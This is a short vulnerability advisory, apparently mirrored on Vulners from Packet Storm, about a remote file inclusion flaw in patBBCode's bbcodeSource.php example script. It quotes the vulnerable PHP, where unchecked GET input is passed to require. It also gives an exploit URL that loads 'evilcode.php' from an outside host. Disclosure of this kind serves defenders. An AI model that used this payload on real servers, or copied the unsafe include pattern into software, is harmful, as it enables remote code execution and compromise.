Lucene search

K

patbb-rfi.txt

๐Ÿ—“๏ธย 13 Nov 2007ย 00:00:00Reported byย p4sswdTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

Vulnerability in patExampleGen bbcodeSource.php file

Show more
Code
`Link to download:  
http://www.php-tools.net/site.php?file=patBBCode/overview.xml  
  
Vuln file:  
examples\patExampleGen\bbcodeSource.php  
  
Vuln code:  
if( !isset( $_GET['example'] ) )  
die( 'No example selected.' );  
  
$exampleId = $_GET['example'];  
  
ob_start();  
  
// make the example think it's still in the right place  
chdir( '../' );  
  
// include the example  
require $exampleId.'.php';  
  
ob_end_clean();  
  
Exploit:  
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4
15
.json
Report